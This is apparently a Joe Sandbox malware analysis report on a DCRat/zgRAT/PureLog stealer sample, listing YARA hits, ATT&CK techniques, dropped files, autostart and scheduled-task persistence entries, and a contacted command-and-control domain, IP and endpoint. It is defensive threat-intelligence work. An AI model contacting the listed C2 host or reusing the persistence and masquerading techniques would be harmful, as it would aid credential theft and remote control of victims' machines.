                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\dllhost.exe VolumeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\dllhost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PlZA6b48MW.exe PID: 7332, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: PlZA6b48MW.exe PID: 8256, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: PlZA6b48MW.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: PlZA6b48MW.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PlZA6b48MW.exe PID: 7332, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: PlZA6b48MW.exe PID: 8256, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: PlZA6b48MW.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: PlZA6b48MW.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		OS Credential Dumping2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		2
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory14
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt31
                            Registry Run Keys / Startup Folder                            		31
                            Registry Run Keys / Startup Folder                            		2
                            Obfuscated Files or Information                            		Security Account Manager11
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture13
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets31
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                            Masquerading                            		DCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586157 Sample: PlZA6b48MW.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 98 505905cm.n9shka.top 2->98 102 Suricata IDS alerts for network traffic 2->102 104 Found malware configuration 2->104 106 Antivirus detection for URL or domain 2->106 108 18 other signatures 2->108 10 PlZA6b48MW.exe 9 32 2->10         started        14 PlZA6b48MW.exe 2->14         started        17 WtHZilDMhVnOIkoIfPBLn.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 dnsIp5 80 C:\Windows\...\WtHZilDMhVnOIkoIfPBLn.exe, PE32 10->80 dropped 82 C:\Users\user\Desktop\kkpLxnoP.log, PE32 10->82 dropped 92 13 other malicious files 10->92 dropped 118 Creates an undocumented autostart registry key 10->118 120 Creates multiple autostart registry keys 10->120 122 Creates an autostart registry key pointing to binary in C:\Windows 10->122 126 2 other signatures 10->126 21 cmd.exe 10->21         started        24 csc.exe 4 10->24         started        27 powershell.exe 23 10->27         started        33 5 other processes 10->33 100 505905cm.n9shka.top 37.44.238.250, 49730, 49735, 49738 HARMONYHOSTING-ASFR France 14->100 84 C:\Users\user\Desktop\nIcTiRiZ.log, PE32 14->84 dropped 86 C:\Users\user\Desktop\kAfKNzod.log, PE32 14->86 dropped 88 C:\Users\user\Desktop\dZJDzodr.log, PE32 14->88 dropped 94 2 other malicious files 14->94 dropped 29 cmd.exe 14->29         started        90 C:\Users\user\Desktop\bTenUpua.log, PE32 17->90 dropped 96 4 other malicious files 17->96 dropped 31 cmd.exe 17->31         started        124 Multi AV Scanner detection for dropped file 19->124 file6 signatures7 process8 file9 110 Uses ping.exe to sleep 21->110 112 Uses ping.exe to check the status of other devices and networks 21->112 35 PlZA6b48MW.exe 21->35         started        46 3 other processes 21->46 78 C:\Windows\...\SecurityHealthSystray.exe, PE32 24->78 dropped 114 Infects executable files (exe, dll, sys, html) 24->114 38 conhost.exe 24->38         started        40 cvtres.exe 1 24->40         started        116 Loading BitLocker PowerShell Module 27->116 48 2 other processes 27->48 42 PlZA6b48MW.exe 29->42         started        50 3 other processes 29->50 44 conhost.exe 31->44         started        52 5 other processes 33->52 signatures10 process11 file12 62 C:\Users\user\Desktop\ZBNMMRPs.log, PE32 35->62 dropped 64 C:\Users\user\Desktop\YNJEaDTu.log, PE32 35->64 dropped 66 C:\Users\user\Desktop\OeqoqbNM.log, PE32 35->66 dropped 74 2 other malicious files 35->74 dropped 54 cmd.exe 35->54         started        68 C:\Users\user\Desktop\uWGScrdc.log, PE32 42->68 dropped 70 C:\Users\user\Desktop\mSTLtqAw.log, PE32 42->70 dropped 72 C:\Users\user\Desktop\euKdPjTG.log, PE32 42->72 dropped 76 2 other malicious files 42->76 dropped process13 process14 56 conhost.exe 54->56         started        58 chcp.com 54->58         started        60 w32tm.exe 54->60         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            PlZA6b48MW.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            PlZA6b48MW.exe100%AviraHEUR/AGEN.1323342
                            PlZA6b48MW.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files\Windows Multimedia Platform\dllhost.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat100%AviraBAT/Delbat.C
                            C:\Users\user\Desktop\CwRRQJIe.log100%AviraTR/PSW.Agent.qngqt
                            C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat100%AviraBAT/Delbat.C
                            C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Windows Multimedia Platform\dllhost.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\CwRRQJIe.log100%Joe Sandbox ML
                            C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\FvWYGyIe.log100%Joe Sandbox ML
                            C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Multimedia Platform\dllhost.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\CwRRQJIe.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\FvWYGyIe.log8%ReversingLabs
                            C:\Users\user\Desktop\GOnzOWoM.log8%ReversingLabs
                            C:\Users\user\Desktop\IXnYeTUQ.log25%ReversingLabs
                            C:\Users\user\Desktop\LARQmQKJ.log25%ReversingLabs
                            C:\Users\user\Desktop\MiiYvNyr.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\OeqoqbNM.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\RCSpyiiu.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\UqqnPMXK.log8%ReversingLabs
                            C:\Users\user\Desktop\YNJEaDTu.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\ZBNMMRPs.log25%ReversingLabs
                            C:\Users\user\Desktop\ZwLVNbth.log8%ReversingLabs
                            C:\Users\user\Desktop\bTenUpua.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\dZJDzodr.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\euKdPjTG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\kAfKNzod.log25%ReversingLabs
                            C:\Users\user\Desktop\kkpLxnoP.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\mSTLtqAw.log25%ReversingLabs
                            C:\Users\user\Desktop\nIcTiRiZ.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\uWGScrdc.log8%ReversingLabs
                            C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://505905cm.n9shka.top/imagePollLinuxCentral.php100%Avira URL Cloudmalware
                            http://505905cm.n9shka.top100%Avira URL Cloudmalware
                            http://505905cm.n9shka.top/100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            505905cm.n9shka.top
                            		37.44.238.250
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://505905cm.n9shka.top/imagePollLinuxCentral.phptrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://505905cm.n9shka.topPlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003743000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 0000001B.00000002.3256027350.000001A190077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://505905cm.n9shka.top/PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      37.44.238.250
                                                      		505905cm.n9shka.topFrance
                                                      		49434HARMONYHOSTING-ASFRtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1586157
                                                      Start date and time:2025-01-08 19:21:05 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 10m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:70
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Sample name:PlZA6b48MW.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:32db4bf35b9c2efc730718e2f8cd4fbc.exe
                                                      Detection:MAL
                                                      Classification:mal100.spre.troj.expl.evad.winEXE@69/82@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 20%
                                                      HCA Information:Failed
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8256 because it is empty
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8380 because it is empty
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8836 because it is empty
                                                      • Execution Graph export aborted for target WtHZilDMhVnOIkoIfPBLn.exe, PID 8696 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: PlZA6b48MW.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      13:22:01API Interceptor161x Sleep call for process: powershell.exe modified
                                                      13:22:12API Interceptor3x Sleep call for process: PlZA6b48MW.exe modified
                                                      13:22:22API Interceptor1x Sleep call for process: WtHZilDMhVnOIkoIfPBLn.exe modified
                                                      18:21:59Task SchedulerRun new task: dllhost path: "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:00Task SchedulerRun new task: dllhostd path: "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:00Task SchedulerRun new task: PlZA6b48MW path: "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:00Task SchedulerRun new task: PlZA6b48MWP path: "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:01Task SchedulerRun new task: WtHZilDMhVnOIkoIfPBLn path: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:01Task SchedulerRun new task: WtHZilDMhVnOIkoIfPBLnW path: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:56AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:23:05AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:23:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:23:34AutostartRun: WinLogon Shell "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe"
                                                      18:23:43AutostartRun: WinLogon Shell "C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:23:52AutostartRun: WinLogon Shell "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:24:01AutostartRun: WinLogon Shell "C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:24:09AutostartRun: WinLogon Shell "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
